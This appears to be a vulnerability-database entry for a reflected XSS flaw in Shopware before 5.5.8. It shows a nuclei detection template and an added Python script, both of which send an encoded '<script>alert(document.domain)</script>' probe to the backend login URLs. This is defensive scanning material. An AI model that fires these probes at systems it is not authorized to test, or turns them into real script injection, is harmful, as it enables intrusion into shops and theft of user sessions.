Shopware < 5.5.8 - Cross-Site Scripting

Published: 28 Jun 2026 15:08:32 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com

Shopware versions before 5.5.8 have reflected XSS via unsanitized login URL parameters.

Related entries

Reporter              Title                                                            Published
Circl                 CVE-2019-12935                                                   15 Jan 2026 07:49
CVE                   CVE-2019-12935                                                   23 Jun 2019 22:23
Cvelist               CVE-2019-12935                                                   23 Jun 2019 22:23
EUVD                  EUVD-2022-3219                                                   3 Oct 2025 20:07
Github Security Blog  Shopware Cross-site Scripting Vulnerability                      24 May 2022 22:00
NVD                   CVE-2019-12935                                                   23 Jun 2019 23:15
OSV                   CVE-2019-12935                                                   23 Jun 2019 23:15
OSV                   GHSA-8QXH-HCR9-2379 Shopware Cross-site Scripting Vulnerability  24 May 2022 22:00
Prion                 Design/Logic Flaw                                                23 Jun 2019 23:15
RedhatCVE             CVE-2019-12935                                                   5 Feb 2025 18:07

Code

id: CVE-2019-12935

info:
  name: Shopware < 5.5.8 - Cross-Site Scripting
  author: pussycat0x
  severity: high
  description: |
    Shopware before 5.5.8 contains a reflected cross-site scripting (XSS) caused by unsanitized query string parameters in the backend/Login or backend/Login/load/ URI, letting attackers execute arbitrary scripts in the context of the victim's browser, exploit requires sending crafted URL to the victim.
  impact: |
    Attackers can execute malicious scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 5.5.8 or later.
  reference:
    - https://www.miggo.io/vulnerability-database/cve/CVE-2019-12935
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12935
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
    cvss-score: 7.4
    cve-id: CVE-2019-12935
    epss-score: 0.02734
    epss-percentile: 0.84261
    cwe-id: CWE-79
  metadata:
    verified: false
    max-request: 2
  tags: cve,cve2019,shopware,xss

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin"
      - "{{BaseURL}}/backend"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body, 'Realisiert mit Shopware','Realised with Shopware','Shopware Administration (c) shopware AG','<title>Shopware 5 - Backend (c) shopware AG</title>','Shopware.Application.start')"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/backend/Login?error=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
      - "{{BaseURL}}/backend/Login/load/?param=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"

      - type: status
        status:
          - 200
          - 401
        condition: or
# digest: 490a0046304402202bc560e9e3ea6999b81e8eb173f915c97e785dd98d3896c16261c79fa1d5b58202207a8d3ccc2071f86ba77f96ae872ab0f1f5c1bc7afb6bf2a3920c84f2a2af9b6f:922c64590222798bb761d5b6d8e72950
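As an added example, not taken from the Vulners page, from ProjectDiscovery's template or from Shopware, the following Python script reproduces the template's two-stage logic in plain code: stage 1 fingerprints a Shopware 5 backend on /admin or /backend using the same marker strings, stage 2 requests the two backend login URLs with the probe string percent-encoded exactly as the template does and reports whether the probe comes back unencoded. The hostnames shop.example and fixed.example and the response bodies in CONSTRUCTED_RESPONSES are constructed for the offline run, not captured from a real installation; fake_fetch serves them in place of real HTTP.

```python
"""
Re-implementation of the two-stage check in the nuclei template for
CVE-2019-12935 (added example; not ProjectDiscovery's or Shopware's code).

Stage 1: confirm the target serves a Shopware 5 backend (/admin or /backend).
Stage 2: request the backend login URLs with the probe string
         <script>alert(document.domain)</script> and report whether it is
         reflected unencoded in the response body.

Standard library only. Real HTTP is done by fetch(); check_target() takes
the fetcher as a parameter so the logic can be run offline against the
constructed responses at the bottom of the file.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional, Tuple

PROBE = "<script>alert(document.domain)</script>"

# Fingerprint strings taken from the template's stage-1 matcher.
SHOPWARE_MARKERS = (
    "Realisiert mit Shopware",
    "Realised with Shopware",
    "Shopware Administration (c) shopware AG",
    "<title>Shopware 5 - Backend (c) shopware AG</title>",
    "Shopware.Application.start",
)

# Path + parameter pairs from the template's stage-2 request.
PROBE_PATHS = ("/backend/Login?error=", "/backend/Login/load/?param=")

Fetcher = Callable[[str], Tuple[int, str]]


def is_shopware_backend(status: int, body: str) -> bool:
    """Stage-1 matcher: HTTP 200 and at least one Shopware marker in the body."""
    return status == 200 and any(m in body for m in SHOPWARE_MARKERS)


def is_reflected(status: int, body: str) -> bool:
    """Stage-2 matcher: probe echoed verbatim with status 200 or 401.

    The comparison is on the raw string, so a body carrying only the escaped
    form (&lt;script&gt;...) does not match; that is what a patched install
    that HTML-encodes the parameter is expected to return.
    """
    return status in (200, 401) and PROBE in body


def fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """GET url and return (status, body); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2019-12935-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe_url(base: str, path: str) -> str:
    """Build the probe URL with the same percent-encoding the template uses."""
    return base.rstrip("/") + path + urllib.parse.quote(PROBE, safe="")


def check_target(base_url: str, fetcher: Fetcher = fetch) -> Optional[str]:
    """Return the first URL at which the probe is reflected, else None.

    Mirrors the template flow `http(1) && http(2)`: stage 2 only runs when
    stage 1 identified a Shopware backend.
    """
    base = base_url.rstrip("/")
    if not any(is_shopware_backend(*fetcher(base + p)) for p in ("/admin", "/backend")):
        return None
    for path in PROBE_PATHS:
        url = probe_url(base, path)
        if is_reflected(*fetcher(url)):
            return url
    return None


# Constructed responses (not captured from a real shop) for an offline run:
# one backend that echoes the parameter raw, one that HTML-escapes it.
_ESCAPED = "&lt;script&gt;alert(document.domain)&lt;/script&gt;"
_BACKEND = "<title>Shopware 5 - Backend (c) shopware AG</title>"
CONSTRUCTED_RESPONSES = {
    "http://shop.example/admin": (200, _BACKEND),
    probe_url("http://shop.example", PROBE_PATHS[0]): (200, f"<div class='error'>{PROBE}</div>"),
    "http://fixed.example/admin": (200, _BACKEND),
    probe_url("http://fixed.example", PROBE_PATHS[0]): (200, f"<div class='error'>{_ESCAPED}</div>"),
    probe_url("http://fixed.example", PROBE_PATHS[1]): (200, f"<div class='error'>{_ESCAPED}</div>"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for fetch(): unknown URLs get a 404."""
    return CONSTRUCTED_RESPONSES.get(url, (404, "not found"))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://shop.example"
    chosen = fake_fetch if target.endswith(".example") else fetch
    hit = check_target(target, chosen)
    print(f"reflected at {hit}" if hit else "no reflection observed")
```

Run it as `python3 check.py https://host-you-are-authorized-to-test`; with no argument it runs against the constructed responses. A literal match on the probe shows the parameter is echoed unescaped, which is all the template's word matcher establishes; it does not prove execution. The template is marked verified: false, and whether the reflection lands in a context where the script tag actually runs has to be confirmed in a browser before it is reported. The status matcher also accepts 401 because an unauthenticated request to the backend can be refused while the page still renders the echoed parameter.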

Scores (as of 04 Feb 2026 07:00)

Vulners AI Score  6.9 (Medium risk)
CVSS 2            4.3
CVSS 3            6.1 - 7.4
EPSS              0.02734